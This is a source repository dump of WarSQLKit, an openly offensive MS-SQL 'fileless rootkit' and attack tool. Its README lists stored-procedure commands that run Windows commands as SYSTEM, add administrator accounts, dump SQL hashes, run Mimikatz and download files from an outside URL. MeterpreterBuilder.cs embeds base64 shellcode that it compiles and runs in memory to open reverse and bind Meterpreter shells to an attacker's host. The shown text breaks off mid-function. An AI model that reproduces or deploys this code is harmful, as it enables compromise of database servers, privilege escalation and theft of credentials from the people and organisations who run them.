├── LICENSE ├── README.md ├── WarSQLKit.sln ├── WarSQLKit ├── CreateKumpir.cs ├── FileDownloader.cs ├── MeterpreterBuilder.cs ├── Properties │ └── AssemblyInfo.cs ├── StoredProcedures.cs ├── WarSQLKit.sqlproj ├── WarSQLKit.sqlproj.user └── bin │ └── Debug │ ├── Confused │ └── WarSQLKit.dll │ ├── WarSQLKit.dacpac │ ├── WarSQLKit.dll │ └── WarSQLKit.pdb └── WarSQLKitMinimal ├── Properties └── AssemblyInfo.cs ├── StoredProcedure.cs ├── WarSQLKitMinimal.sqlproj ├── WarSQLKitMinimal.sqlproj.user └── bin └── Debug ├── WarSQLKitMinimal.dacpac ├── WarSQLKitMinimal.dll └── WarSQLKitMinimal.pdb /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Eyüp Çelik 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MSSQL Fileless Rootkit - WarSQLKit 2 | 3 | ![MSSQL Fileless Rootkit - WarSQLKit](https://eyupcelik.com.tr/wp-content/uploads/2017/09/WarSQLKit.png) 4 | 5 | WarSQLKit is a fileless rootkit and attack tool I developed for MS-SQL. With this tool you can rootkit the SQL service that uses CLR on MS-SQL servers. Thus, malicious code can be executed in the process memory of the SQL service without creating a malicious function in the operating system or file system, and security products and technologies can be bypassed. The tool was developed considering a scenario in which an account with "sysadmin" rights is obtained and none of the stored procedures such as "xp_cmdshell", "sp_OACreate", "sp_OAMethod" are running. This tool will show you that MS-SQL is much more than these stored procedures. 6 | 7 | I described the tool and the techniques I used to develop it in a red team test for a client in 2016 and decided to share it as open source a year later in 2017. 8 | 9 | WarSQLKit is suitable for refactoring and combining with other tools and techniques. You can find the techniques and methods used in the tool in my blog below. 10 | 11 | https://eyupcelik.com.tr/mssql-fileless-rootkit-warsqlkit/ 12 | 13 | # WarSQLKit Command Example 14 | ```sql 15 | EXEC sp_cmdExec 'whoami'; => Any Windows command 16 | EXEC sp_cmdExec 'whoami /RunSystemPriv'; => Any Windows command with NT AUTHORITY\SYSTEM rights 17 | EXEC sp_cmdExec '"net user eyup P@ssw0rd1 /add" /RunSystemPriv'; => Adding users with RottenPotato (Kumpir) 18 | EXEC sp_cmdExec '"net localgroup administrators eyup /add" /RunSystemPriv'; => Adding user to localgroup with RottenPotato (Kumpir) 19 | EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS'; => (Powershell) with RottenPotato (Kumpir) 20 | EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection with NT AUTHORITY\SYSTEM 21 | EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem'; => x64 Meterpreter Reverse Connection with NT AUTHORITY\SYSTEM 22 | EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'; => x86 Meterpreter Reverse Connection RC4 with NT AUTHORITY\SYSTEM, RC4PASSWORD=warsql 23 | EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem'; => x86 Meterpreter Bind Connection with NT AUTHORITY\SYSTEM 24 | EXEC sp_cmdExec 'sp_Mimikatz'; 25 | select * from WarSQLKitTemp => Get Mimikatz Log. Thnks Benjamin Delpy :) 26 | EXEC sp_cmdExec 'sp_downloadFile http://eyupcelik.com.tr/file.exe C:\ProgramData\file.exe 300'; => Download File 27 | EXEC sp_cmdExec 'sp_getSqlHash'; => Get MSSQL Hash 28 | EXEC sp_cmdExec 'sp_getProduct'; => Get Windows Product 29 | EXEC sp_cmdExec 'sp_getDatabases'; => Get Available Database 30 | ``` 31 | -------------------------------------------------------------------------------- /WarSQLKit.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{00D1A9C2-B5F0-4AF3-8072-F6C62B433612}") = "WarSQLKit", "WarSQLKit\WarSQLKit.sqlproj", "{C6001C77-007A-4851-9371-61828D235C4E}" 7 | EndProject 8 | Project("{00D1A9C2-B5F0-4AF3-8072-F6C62B433612}") = "WarSQLKitMinimal", "WarSQLKitMinimal\WarSQLKitMinimal.sqlproj", "{B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Debug|x64 = Debug|x64 14 | Release|Any CPU = Release|Any CPU 15 | Release|x64 = Release|x64 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {C6001C77-007A-4851-9371-61828D235C4E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {C6001C77-007A-4851-9371-61828D235C4E}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {C6001C77-007A-4851-9371-61828D235C4E}.Debug|Any CPU.Deploy.0 = Debug|Any CPU 21 | {C6001C77-007A-4851-9371-61828D235C4E}.Debug|x64.ActiveCfg = Debug|x64 22 | {C6001C77-007A-4851-9371-61828D235C4E}.Debug|x64.Build.0 = Debug|x64 23 | {C6001C77-007A-4851-9371-61828D235C4E}.Debug|x64.Deploy.0 = Debug|x64 24 | {C6001C77-007A-4851-9371-61828D235C4E}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {C6001C77-007A-4851-9371-61828D235C4E}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {C6001C77-007A-4851-9371-61828D235C4E}.Release|Any CPU.Deploy.0 = Release|Any CPU 27 | {C6001C77-007A-4851-9371-61828D235C4E}.Release|x64.ActiveCfg = Release|x64 28 | {C6001C77-007A-4851-9371-61828D235C4E}.Release|x64.Build.0 = Release|x64 29 | {C6001C77-007A-4851-9371-61828D235C4E}.Release|x64.Deploy.0 = Release|x64 30 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 31 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|Any CPU.Build.0 = Debug|Any CPU 32 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|Any CPU.Deploy.0 = Debug|Any CPU 33 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|x64.ActiveCfg = Debug|x64 34 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|x64.Build.0 = Debug|x64 35 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Debug|x64.Deploy.0 = Debug|x64 36 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|Any CPU.ActiveCfg = Release|Any CPU 37 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|Any CPU.Build.0 = Release|Any CPU 38 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|Any CPU.Deploy.0 = Release|Any CPU 39 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|x64.ActiveCfg = Release|x64 40 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|x64.Build.0 = Release|x64 41 | {B4E1BEE9-3454-4D2F-A6D7-E47FD5B602B8}.Release|x64.Deploy.0 = Release|x64 42 | EndGlobalSection 43 | GlobalSection(SolutionProperties) = preSolution 44 | HideSolutionNode = FALSE 45 | EndGlobalSection 46 | EndGlobal 47 | -------------------------------------------------------------------------------- /WarSQLKit/FileDownloader.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.ComponentModel; 3 | using System.IO; 4 | using System.Net; 5 | using System.Threading; 6 | using Microsoft.SqlServer.Server; 7 | 8 | namespace WarSQLKit 9 | { 10 | class FileDownloader 11 | { 12 | private readonly string _url; 13 | private readonly string _fullPathWhereToSave; 14 | private bool _result = false; 15 | private readonly SemaphoreSlim _semaphore = new SemaphoreSlim(0); 16 | public FileDownloader(string url, string fullPathWhereToSave) 17 | { 18 | if (string.IsNullOrEmpty(url)) throw new ArgumentNullException("url"); 19 | if (string.IsNullOrEmpty(fullPathWhereToSave)) throw new ArgumentNullException("fullPathWhereToSave"); 20 | 21 | _url = url; 22 | _fullPathWhereToSave = fullPathWhereToSave; 23 | } 24 | public bool StartDownload(int timeout) 25 | { 26 | try 27 | { 28 | Directory.CreateDirectory(Path.GetDirectoryName(_fullPathWhereToSave)); 29 | 30 | if (File.Exists(_fullPathWhereToSave)) 31 | { 32 | File.Delete(_fullPathWhereToSave); 33 | } 34 | using (WebClient client = new WebClient()) 35 | { 36 | var ur = new Uri(_url); 37 | client.DownloadProgressChanged += WebClientDownloadProgressChanged; 38 | client.DownloadFileCompleted += WebClientDownloadCompleted; 39 | SqlContext.Pipe.Send(@"Downloading file:"); 40 | client.DownloadFileAsync(ur, _fullPathWhereToSave); 41 | _semaphore.Wait(timeout); 42 | return _result && File.Exists(_fullPathWhereToSave); 43 | } 44 | } 45 | catch (Exception e) 46 | { 47 | SqlContext.Pipe.Send("Was not able to download file!"); 48 | SqlContext.Pipe.Send(e.Message); 49 | return false; 50 | } 51 | finally 52 | { 53 | _semaphore.Dispose(); 54 | } 55 | } 56 | private void WebClientDownloadProgressChanged(object sender, DownloadProgressChangedEventArgs e) 57 | { 58 | SqlContext.Pipe.Send("\r --> {0}%."+ e.ProgressPercentage); 59 | } 60 | private void WebClientDownloadCompleted(object sender, AsyncCompletedEventArgs args) 61 | { 62 | SqlContext.Pipe.Send(Environment.NewLine + "Download finished!"); 63 | _result = !args.Cancelled; 64 | if (!_result) 65 | { 66 | SqlContext.Pipe.Send(args.Error.ToString()); 67 | } 68 | _semaphore.Release(); 69 | } 70 | [Microsoft.SqlServer.Server.SqlProcedure] 71 | public static bool DownloadFile(string url, string fullPathWhereToSave, int timeoutInMilliSec) 72 | { 73 | return new FileDownloader(url, fullPathWhereToSave).StartDownload(timeoutInMilliSec); 74 | } 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /WarSQLKit/MeterpreterBuilder.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.Text; 6 | using Microsoft.SqlServer.Server; 7 | 8 | namespace WarSQLKit 9 | { 10 | class MeterpreterBuilder 11 | { 12 | public string Ip = string.Empty; 13 | public string Port = string.Empty; 14 | public bool IsRunSystemPriv = false; 15 | private static List _netFrameworkList = new List(); 16 | private static List _x64NetFrameworkList = new List(); 17 | [Microsoft.SqlServer.Server.SqlProcedure] 18 | public void SaveReverseMeterpreter() 19 | { 20 | var randomFileName = RandomFileName(0, 12); 21 | SqlContext.Pipe.Send("Meterpreter C# File is being created."); 22 | var strMtr = "using System;" + 23 | "using System.Runtime.InteropServices;" + 24 | "using System.Threading.Tasks;" + 25 | 26 | "namespace WarSQLKit_Builder" + 27 | "{" + 28 | "class ReverseMeterpreter" + 29 | "{" + 30 | "static void Main(string[] args)" + 31 | "{" + 32 | "Task.Factory.StartNew(() => RunMeterpreter(\""+ Ip +"\", \""+ Port +"\"));" + 33 | "var str = Convert.ToString(Console.ReadLine());" + 34 | "}" + 35 | "public static void RunMeterpreter(string ip, string port)" + 36 | "{" + 37 | "try" + 38 | "{" + 39 | "var ipOctetSplit = ip.Split('.');" + 40 | "byte octByte1 = Convert.ToByte(ipOctetSplit[0]);" + 41 | "byte octByte2 = Convert.ToByte(ipOctetSplit[1]);" + 42 | "byte octByte3 = Convert.ToByte(ipOctetSplit[2]);" + 43 | "byte octByte4 = Convert.ToByte(ipOctetSplit[3]);" + 44 | "int inputPort = Int32.Parse(port);" + 45 | "byte port1Byte = 0x00;" + 46 | "byte port2Byte = 0x00;" + 47 | "if (inputPort > 256)" + 48 | "{" + 49 | "int portOct1 = inputPort / 256;" + 50 | "int portOct2 = portOct1 * 256;" + 51 | "int portOct3 = inputPort - portOct2;" + 52 | "int portoct1Calc = portOct1 * 256 + portOct3;" + 53 | "if (inputPort == portoct1Calc)" + 54 | "{" + 55 | "port1Byte = Convert.ToByte(portOct1);" + 56 | "port2Byte = Convert.ToByte(portOct3);" + 57 | "}" + 58 | "}" + 59 | "else"+ 60 | "{"+ 61 | "port1Byte = 0x00;" + 62 | "port2Byte = Convert.ToByte(inputPort);" + 63 | "}"+ 64 | "byte[] shellCodePacket = new byte[9];" + 65 | "shellCodePacket[0] = octByte1;" + 66 | "shellCodePacket[1] = octByte2;" + 67 | "shellCodePacket[2] = octByte3;" + 68 | "shellCodePacket[3] = octByte4;" + 69 | "shellCodePacket[4] = 0x68;" + 70 | "shellCodePacket[5] = 0x02;" + 71 | "shellCodePacket[6] = 0x00;" + 72 | "shellCodePacket[7] = port1Byte;" + 73 | "shellCodePacket[8] = port2Byte;" + 74 | "string shellCodeRaw = \"/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VagVowKiLhmgCANkDieZQUFBQQFBAUGjqD9/g/9WXahBWV2iZpXRh/9WFwHQK/04IdezoYQAAAGoAagRWV2gC2chf/9WD+AB+Nos2akBoABAAAFZqAGhYpFPl/9WTU2oAVlNXaALZyF//1YP4AH0iWGgAQAAAagBQaAsvDzD/1VdodW5NYf/VXl7/DCTpcf///wHDKcZ1x8M=\";" + 75 | 76 | "string s3 = Convert.ToBase64String(shellCodePacket);" + 77 | "string newShellCode = shellCodeRaw.Replace(\"wKiLhmgCANkD\", s3);" + 78 | "byte[] shellCodeBase64 = Convert.FromBase64String(newShellCode);" + 79 | "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellCodeBase64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" + 80 | "Marshal.Copy(shellCodeBase64, 0, (IntPtr)(funcAddr), shellCodeBase64.Length);" + 81 | "IntPtr hThread = IntPtr.Zero;" + 82 | "UInt32 threadId = 0;" + 83 | "IntPtr pinfo = IntPtr.Zero;" + 84 | "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);" + 85 | "WaitForSingleObject(hThread, 0xFFFFFFFF);" + 86 | "return;" + 87 | "}" + 88 | "catch (Exception e)" + 89 | "{" + 90 | "Console.WriteLine(e);" + 91 | "throw;" + 92 | "}" + 93 | "}" + 94 | 95 | "private static UInt32 MEM_COMMIT = 0x1000;" + 96 | "private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;" + 97 | "[DllImport(\"kernel32\")]" + 98 | "private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);" + 99 | "[DllImport(\"kernel32\")]" + 100 | "private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);" + 101 | "[DllImport(\"kernel32\")]" + 102 | "private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);" + 103 | "}" + 104 | "}"; 105 | NetFrameWorkDirectory(); 106 | File.WriteAllText(@"C:\\ProgramData\\" + randomFileName + @"_reverse.cs", strMtr); 107 | SqlContext.Pipe.Send("Meterpreter C# File created."); 108 | SqlContext.Pipe.Send("CSharp Compiler is running."); 109 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\Windows\Microsoft.NET\Framework\"+ _netFrameworkList[_netFrameworkList.Count - 1] +@"\csc.exe /unsafe /platform:x86 /out:C:\ProgramData\" + randomFileName + @"_reverse.exe " + @"C:\ProgramData\" + randomFileName + @"_reverse.cs"); 110 | SqlContext.Pipe.Send("Meterpreter compiled."); 111 | File.Delete(@"C:\ProgramData\" + randomFileName + @"_reverse.cs"); 112 | if (IsRunSystemPriv == true) 113 | { 114 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\\ProgramData\\Kumpir.exe C:\ProgramData\" + randomFileName + @"_reverse.exe"); 115 | } 116 | else 117 | { 118 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\" + randomFileName + @"_reverse.exe"); 119 | } 120 | } 121 | public void SaveBindMeterpreter() 122 | { 123 | var randomFileName = RandomFileName(0, 12); 124 | SqlContext.Pipe.Send("Meterpreter C# File is being created."); 125 | var strMtr = "using System;" + 126 | "using System.Collections.Generic;" + 127 | "using System.IO;" + 128 | "using System.Runtime.InteropServices;" + 129 | "using System.Text;" + 130 | "using System.Threading;" + 131 | 132 | "namespace WarSQLKit_Builder" + 133 | "{" + 134 | "class BindMeterpreter" + 135 | "{" + 136 | "static void Main(string[] args)" + 137 | "{" + 138 | " RunMeterpreter(\"" + Port + "\");" + 139 | "var str = Convert.ToString(Console.ReadLine());" + 140 | "}" + 141 | "public static void RunMeterpreter(string port)" + 142 | "{" + 143 | "try" + 144 | "{" + 145 | "int inputPort = Int32.Parse(port);" + 146 | "byte port1Byte = 0x00;" + 147 | "byte port2Byte = 0x00;" + 148 | "byte[] shellCodePacket = new byte[6];" + 149 | "if (inputPort > 256)" + 150 | "{" + 151 | "int portOct1 = inputPort / 256;" + 152 | "int portOct2 = portOct1 * 256;" + 153 | "int portOct3 = inputPort - portOct2;" + 154 | "int portoct1Calc = portOct1 * 256 + portOct3;" + 155 | "if (inputPort == portoct1Calc)" + 156 | "{" + 157 | "port1Byte = Convert.ToByte(portOct1);" + 158 | "port2Byte = Convert.ToByte(portOct3);" + 159 | "shellCodePacket[0] = 0x68;" + 160 | "shellCodePacket[1] = 0x02;" + 161 | "shellCodePacket[2] = 0x00;" + 162 | "shellCodePacket[3] = port1Byte;" + 163 | "shellCodePacket[4] = port2Byte;" + 164 | "shellCodePacket[5] = 0x89;" + 165 | "}" + 166 | "}" + 167 | "else" + 168 | "{" + 169 | "shellCodePacket[0] = 0x68;" + 170 | "shellCodePacket[1] = 0x02;" + 171 | "shellCodePacket[2] = 0x00;" + 172 | "shellCodePacket[3] = port1Byte;" + 173 | "shellCodePacket[4] = Convert.ToByte(inputPort);" + 174 | "shellCodePacket[5] = 0x89;" + 175 | "}" + 176 | 177 | "string shellCodeRaw = \"/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYH/9W4kAEAACnEVFBoKYBrAP/VagtZUOL9agFqAmjqD9/g/9WXaAIAEVyJ5moQVldowts3Z//VhcB1WFdot+k4///VV2h07Dvh/9VXl2h1bk1h/9VqAGoEVldoAtnIX//Vg/gAfi2LNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9WD+AB+BwHDKcZ16cM=\";" + 178 | 179 | "string s3 = Convert.ToBase64String(shellCodePacket);" + 180 | "string newShellCode = shellCodeRaw.Replace(\"aAIAEVyJ\", s3);" + 181 | "byte[] shellCodeBase64 = Convert.FromBase64String(newShellCode);" + 182 | "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellCodeBase64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" + 183 | "Marshal.Copy(shellCodeBase64, 0, (IntPtr)(funcAddr), shellCodeBase64.Length);" + 184 | "IntPtr hThread = IntPtr.Zero;" + 185 | "UInt32 threadId = 0;" + 186 | "IntPtr pinfo = IntPtr.Zero;" + 187 | "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);" + 188 | "WaitForSingleObject(hThread, 0xFFFFFFFF);" + 189 | "return;" + 190 | "}" + 191 | "catch (Exception e)" + 192 | "{" + 193 | "Console.WriteLine(e);" + 194 | "throw;" + 195 | "}" + 196 | "}" + 197 | 198 | "private static UInt32 MEM_COMMIT = 0x1000;" + 199 | "private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;" + 200 | "[DllImport(\"kernel32\")]" + 201 | "private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);" + 202 | "[DllImport(\"kernel32\")]" + 203 | "private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);" + 204 | "[DllImport(\"kernel32\")]" + 205 | "private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);" + 206 | "}" + 207 | "}"; 208 | NetFrameWorkDirectory(); 209 | File.WriteAllText(@"C:\\ProgramData\\" + randomFileName + @"_bind.cs", strMtr); 210 | SqlContext.Pipe.Send("Meterpreter C# File created."); 211 | SqlContext.Pipe.Send("CSharp Compiler is running."); 212 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", 213 | @" /c C:\Windows\Microsoft.NET\Framework\"+ _netFrameworkList[_netFrameworkList.Count - 1] + @"\csc.exe /unsafe /platform:x86 /out:C:\ProgramData\" + 214 | randomFileName + @"_bind.exe " + @"C:\ProgramData\" + randomFileName + @"_bind.cs"); 215 | SqlContext.Pipe.Send("Meterpreter compiled."); 216 | File.Delete(@"C:\ProgramData\" + randomFileName + @"_bind.cs"); 217 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\" + randomFileName + @"_bind.exe"); 218 | } 219 | public void Savex64ReverseMeterpreter() 220 | { 221 | var randomFileName = RandomFileName(0, 12); 222 | SqlContext.Pipe.Send("Meterpreter C# File is being created."); 223 | var strMtr = "using System;" + 224 | "using System.Runtime.InteropServices;" + 225 | 226 | "namespace WarSQLKit_Builder" + 227 | "{" + 228 | "class x64ReverseMeterpreter" + 229 | "{" + 230 | "static void Main(string[] args)" + 231 | "{" + 232 | "RunMeterpreter(\"" + Ip + "\", \"" + Port + "\");" + 233 | "var str = Convert.ToString(Console.ReadLine());" + 234 | "}" + 235 | "public static void RunMeterpreter(string ip, string port)" + 236 | "{" + 237 | "try" + 238 | "{" + 239 | "var ipOctetSplit = ip.Split('.');" + 240 | "byte octByte1 = Convert.ToByte(ipOctetSplit[0]);" + 241 | "byte octByte2 = Convert.ToByte(ipOctetSplit[1]);" + 242 | "byte octByte3 = Convert.ToByte(ipOctetSplit[2]);" + 243 | "byte octByte4 = Convert.ToByte(ipOctetSplit[3]);" + 244 | 245 | "int inputPort = Int32.Parse(port);" + 246 | "byte port1Byte = 0x00;" + 247 | "byte port2Byte = 0x00;" + 248 | "byte[] shellCodePacket = new byte[9];" + 249 | "shellCodePacket[0] = 0x00;" + 250 | "if (inputPort > 256)" + 251 | "{" + 252 | "int portOct1 = inputPort / 256;" + 253 | "int portOct2 = portOct1 * 256;" + 254 | "int portOct3 = inputPort - portOct2;" + 255 | "int portoct1Calc = portOct1 * 256 + portOct3;" + 256 | "if (inputPort == portoct1Calc)" + 257 | "{" + 258 | "port1Byte = Convert.ToByte(portOct1);" + 259 | "port2Byte = Convert.ToByte(portOct3);" + 260 | "shellCodePacket[1] = port1Byte;" + 261 | "shellCodePacket[2] = port2Byte;" + 262 | "}" + 263 | "}" + 264 | "else" + 265 | "{" + 266 | "shellCodePacket[1] = port1Byte;" + 267 | "shellCodePacket[2] = Convert.ToByte(inputPort);" + 268 | "}" + 269 | "shellCodePacket[3] = octByte1;" + 270 | "shellCodePacket[4] = octByte2;" + 271 | "shellCodePacket[5] = octByte3;" + 272 | "shellCodePacket[6] = octByte4;" + 273 | "shellCodePacket[7] = 0x41;" + 274 | "shellCodePacket[8] = 0x54;" + 275 | 276 | "string shellCodeRaw = \"/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKiLgUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoFQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dY\";" + 277 | 278 | "string s3 = Convert.ToBase64String(shellCodePacket);" + 279 | "string newShellCode = shellCodeRaw.Replace(\"ABFcwKiLgUFU\", s3);" + 280 | "byte[] shellCodeBase64 = Convert.FromBase64String(newShellCode);" + 281 | "UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellCodeBase64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" + 282 | "Marshal.Copy(shellCodeBase64, 0, (IntPtr)(funcAddr), shellCodeBase64.Length);" + 283 | "IntPtr hThread = IntPtr.Zero;" + 284 | "UInt32 threadId = 0;" + 285 | "IntPtr pinfo = IntPtr.Zero;" + 286 | "hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);" + 287 | "WaitForSingleObject(hThread, 0xFFFFFFFF);" + 288 | "return;" + 289 | "}" + 290 | "catch (Exception e)" + 291 | "{" + 292 | "Console.WriteLine(e);" + 293 | "throw;" + 294 | "}" + 295 | "}" + 296 | 297 | "private static UInt32 MEM_COMMIT = 0x1000;" + 298 | "private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;" + 299 | "[DllImport(\"kernel32\")]" + 300 | "private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);" + 301 | "[DllImport(\"kernel32\")]" + 302 | "private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);" + 303 | "[DllImport(\"kernel32\")]" + 304 | "private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);" + 305 | "}" + 306 | "}"; 307 | x64NetFrameWorkDirectory(); 308 | File.WriteAllText(@"C:\\ProgramData\\" + randomFileName + @"_x64_reverse.cs", strMtr); 309 | SqlContext.Pipe.Send("Meterpreter C# File created."); 310 | SqlContext.Pipe.Send("CSharp Compiler is running."); 311 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\Windows\Microsoft.NET\Framework64\" + _x64NetFrameworkList[_x64NetFrameworkList.Count - 1] + @"\csc.exe /unsafe /platform:x64 /out:C:\ProgramData\" + randomFileName + @"_x64_reverse.exe " + @"C:\ProgramData\" + randomFileName + @"_x64_reverse.cs"); 312 | SqlContext.Pipe.Send("Meterpreter compiled."); 313 | File.Delete(@"C:\ProgramData\" + randomFileName + @"_x64_reverse.cs"); 314 | if (IsRunSystemPriv == true) 315 | { 316 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\\ProgramData\\Kumpir.exe C:\ProgramData\" + randomFileName + @"_x64_reverse.exe"); 317 | } 318 | else 319 | { 320 | BuildRunMeterpreter(@"C:\Windows\System32\cmd.exe", @" /c C:\ProgramData\" + randomFileName + @"_x64_reverse.exe"); 321 | } 322 | } 323 | public void SaveMeterpreterRc4() 324 | { 325 | var randomFileName = RandomFileName(0, 12); 326 | SqlContext.Pipe.Send("Meterpreter C# File is being created."); 327 | var strMtr = "using System;" + 328 | "using System.Runtime.InteropServices;" + 329 | 330 | "namespace WarSQLKit_Builder" + 331 | "{" + 332 | "class MeterpreterRc4" + 333 | "{" + 334 | "static void Main(string[] args)" + 335 | "{" + 336 | "RunMeterpreter(\"" + Ip + "\", \"" + Port + "\");" + 337 | "var str = Convert.ToString(Console.ReadLine());" + 338 | "}" + 339 | "public static 